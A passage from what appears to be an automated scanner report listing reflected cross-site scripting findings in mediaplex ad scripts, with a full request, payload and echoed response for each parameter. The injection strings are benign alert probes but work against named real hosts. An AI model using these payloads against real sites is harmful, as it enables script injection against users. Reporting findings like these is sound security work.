3.85. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131ce"%3balert(1)//bf80d0968 was submitted in the mpvc parameter. This input was echoed as 131ce";alert(1)//bf80d0968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Billabong_728x90_Male_Stagedive.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-11%3Fmpt%3Dc7bf0c0b67d142d1942f4889cc02b349&mpt=c7bf0c0b67d142d1942f4889cc02b349&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215487__campaignid=38114__zoneid=12267__UTLCA=1__cb=248fea2a941f43f5bf1871f0520578e5__bk=lmvu15__id=djjwgv9ps61khjiw8xrxaqgkm__oadest=131ce"%3balert(1)//bf80d0968 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:07:06 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:14:49 GMT
ETag: "5e04fb-f2f-4a2d94cec4c40"
Accept-Ranges: bytes
Content-Length: 7726
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215487__campaignid=38114__zoneid=12267__UTLCA=1__cb=248fea2a941f43f5bf1871f0520578e5__bk=lmvu15__id=djjwgv9ps61khjiw8xrxaqgkm__oadest=131ce";alert(1)//bf80d0968http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-11%3Fmpt%3Dc7bf0c0b67d142d1942f4889cc02b349&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215487__campaignid=38114__zoneid=12267__U
...[SNIP]...

3.86. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Female_BikeRack.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a22cb"%3balert(1)//301378031d was submitted in the mpck parameter. This input was echoed as a22cb";alert(1)//301378031d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Female_BikeRack.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3De804774426b84396bdd55de3b953537ea22cb"%3balert(1)//301378031d&mpt=e804774426b84396bdd55de3b953537e&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215465__campaignid=38112__zoneid=12268__UTLCA=1__cb=cdb71779817947fcaba7ec64b0b79c11__bk=lmvt2t__id=8ydyxc7x65o29woyozu0ws8q__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:11:39 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:20:34 GMT
ETag: "78ea8b-f1e-4a2e01619b480"
Accept-Ranges: bytes
Content-Length: 7746
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
2__zoneid=12268__UTLCA=1__cb=cdb71779817947fcaba7ec64b0b79c11__bk=lmvt2t__id=8ydyxc7x65o29woyozu0ws8q__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-2?mpt=e804774426b84396bdd55de3b953537ea22cb";alert(1)//301378031d\" target=\"_blank\">
...[SNIP]...

3.87. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Female_BikeRack.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bf03"%3balert(1)//ee1e4f13b40 was submitted in the mpt parameter. This input was echoed as 6bf03";alert(1)//ee1e4f13b40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Female_BikeRack.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3De804774426b84396bdd55de3b953537e&mpt=e804774426b84396bdd55de3b953537e6bf03"%3balert(1)//ee1e4f13b40&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215465__campaignid=38112__zoneid=12268__UTLCA=1__cb=cdb71779817947fcaba7ec64b0b79c11__bk=lmvt2t__id=8ydyxc7x65o29woyozu0ws8q__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:11:50 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:20:34 GMT
ETag: "78ea8b-f1e-4a2e01619b480"
Accept-Ranges: bytes
Content-Length: 7372
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7496702/7496702/'+ st +'/[SiteName]/e804774426b84396bdd55de3b953537e6bf03";alert(1)//ee1e4f13b40';
   w_adldspsend(mcdt);

3.88. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Female_BikeRack.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a11a4"%3balert(1)//e89fc32f983 was submitted in the mpvc parameter. This input was echoed as a11a4";alert(1)//e89fc32f983 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Female_BikeRack.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3De804774426b84396bdd55de3b953537e&mpt=e804774426b84396bdd55de3b953537e&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215465__campaignid=38112__zoneid=12268__UTLCA=1__cb=cdb71779817947fcaba7ec64b0b79c11__bk=lmvt2t__id=8ydyxc7x65o29woyozu0ws8q__oadest=a11a4"%3balert(1)//e89fc32f983 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:12:08 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:20:34 GMT
ETag: "78ea8b-f1e-4a2e01619b480"
Accept-Ranges: bytes
Content-Length: 7708
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
\" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215465__campaignid=38112__zoneid=12268__UTLCA=1__cb=cdb71779817947fcaba7ec64b0b79c11__bk=lmvt2t__id=8ydyxc7x65o29woyozu0ws8q__oadest=a11a4";alert(1)//e89fc32f983http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3De804774426b84396bdd55de3b953537e&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215465__campaignid=38112__zoneid=12268__UT
...[SNIP]...

3.89. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551d6"%3balert(1)//d5cedfebcec was submitted in the mpck parameter. This input was echoed as 551d6";alert(1)//d5cedfebcec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Db3ae87f9f1204c66a95a29612ecd7b63551d6"%3balert(1)//d5cedfebcec&mpt=b3ae87f9f1204c66a95a29612ecd7b63&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=e022ad2be8b34ada8744a13f1c6d479c__bk=lmvv8a__id=9buo5lrm3346ifc5jtgehcd3c__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228058077&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:04 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:15:12 GMT
ETag: "3d3e15-f19-4a3f142eb3800"
Accept-Ranges: bytes
Content-Length: 7782
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
_zoneid=12268__UTLCA=1__cb=e022ad2be8b34ada8744a13f1c6d479c__bk=lmvv8a__id=9buo5lrm3346ifc5jtgehcd3c__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-10?mpt=b3ae87f9f1204c66a95a29612ecd7b63551d6";alert(1)//d5cedfebcec\" target=\"_blank\">
...[SNIP]...

3.90. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a103"%3balert(1)//97109055e42 was submitted in the mpt parameter. This input was echoed as 3a103";alert(1)//97109055e42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Db3ae87f9f1204c66a95a29612ecd7b63&mpt=b3ae87f9f1204c66a95a29612ecd7b633a103"%3balert(1)//97109055e42&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=e022ad2be8b34ada8744a13f1c6d479c__bk=lmvv8a__id=9buo5lrm3346ifc5jtgehcd3c__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228058077&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:15 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:15:12 GMT
ETag: "3d3e15-f19-4a3f142eb3800"
Accept-Ranges: bytes
Content-Length: 7394
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7566949/7566949/'+ st +'/[SiteName]/b3ae87f9f1204c66a95a29612ecd7b633a103";alert(1)//97109055e42';
   w_adldspsend(mcdt);

3.91. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b620"%3balert(1)//0d0b9a595a0 was submitted in the mpvc parameter. This input was echoed as 7b620";alert(1)//0d0b9a595a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Db3ae87f9f1204c66a95a29612ecd7b63&mpt=b3ae87f9f1204c66a95a29612ecd7b63&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=e022ad2be8b34ada8744a13f1c6d479c__bk=lmvv8a__id=9buo5lrm3346ifc5jtgehcd3c__oadest=7b620"%3balert(1)//0d0b9a595a0 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228058077&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:34 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:15:12 GMT
ETag: "3d3e15-f19-4a3f142eb3800"
Accept-Ranges: bytes
Content-Length: 7730
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=e022ad2be8b34ada8744a13f1c6d479c__bk=lmvv8a__id=9buo5lrm3346ifc5jtgehcd3c__oadest=7b620";alert(1)//0d0b9a595a0http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Db3ae87f9f1204c66a95a29612ecd7b63&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__U
...[SNIP]...

3.92. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_RobM.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9918"%3balert(1)//45d7aa27706 was submitted in the mpck parameter. This input was echoed as a9918";alert(1)//45d7aa27706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_RobM.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3D572390f1acc443cf8ed0b0b67081ab95a9918"%3balert(1)//45d7aa27706&mpt=572390f1acc443cf8ed0b0b67081ab95&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215486__campaignid=38114__zoneid=12268__UTLCA=1__cb=889522729bb84d569647875098a3e896__bk=lmvvgv__id=51zvul54txesk2ok8l512mmja__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228367625&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:50 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:24:53 GMT
ETag: "5e0507-f0f-4a2d970ec9b40"
Accept-Ranges: bytes
Content-Length: 7772
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
_zoneid=12268__UTLCA=1__cb=889522729bb84d569647875098a3e896__bk=lmvvgv__id=51zvul54txesk2ok8l512mmja__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-10?mpt=572390f1acc443cf8ed0b0b67081ab95a9918";alert(1)//45d7aa27706\" target=\"_blank\">
...[SNIP]...

3.93. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_RobM.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f45"%3balert(1)//c8898ec22d5 was submitted in the mpt parameter. This input was echoed as 96f45";alert(1)//c8898ec22d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_RobM.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3D572390f1acc443cf8ed0b0b67081ab95&mpt=572390f1acc443cf8ed0b0b67081ab9596f45"%3balert(1)//c8898ec22d5&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215486__campaignid=38114__zoneid=12268__UTLCA=1__cb=889522729bb84d569647875098a3e896__bk=lmvvgv__id=51zvul54txesk2ok8l512mmja__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228367625&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:24:53 GMT
ETag: "5e0507-f0f-4a2d970ec9b40"
Accept-Ranges: bytes
Content-Length: 7384
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7488975/7488975/'+ st +'/[SiteName]/572390f1acc443cf8ed0b0b67081ab9596f45";alert(1)//c8898ec22d5';
   w_adldspsend(mcdt);

3.94. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_RobM.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fd7a"%3balert(1)//63df9a4139d was submitted in the mpvc parameter. This input was echoed as 1fd7a";alert(1)//63df9a4139d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_RobM.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3D572390f1acc443cf8ed0b0b67081ab95&mpt=572390f1acc443cf8ed0b0b67081ab95&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215486__campaignid=38114__zoneid=12268__UTLCA=1__cb=889522729bb84d569647875098a3e896__bk=lmvvgv__id=51zvul54txesk2ok8l512mmja__oadest=1fd7a"%3balert(1)//63df9a4139d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228367625&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:14:21 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:24:53 GMT
ETag: "5e0507-f0f-4a2d970ec9b40"
Accept-Ranges: bytes
Content-Length: 7720
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215486__campaignid=38114__zoneid=12268__UTLCA=1__cb=889522729bb84d569647875098a3e896__bk=lmvvgv__id=51zvul54txesk2ok8l512mmja__oadest=1fd7a";alert(1)//63df9a4139dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3D572390f1acc443cf8ed0b0b67081ab95&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215486__campaignid=38114__zoneid=12268__U
...[SNIP]...

3.95. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_Shorts.js

Issue detail

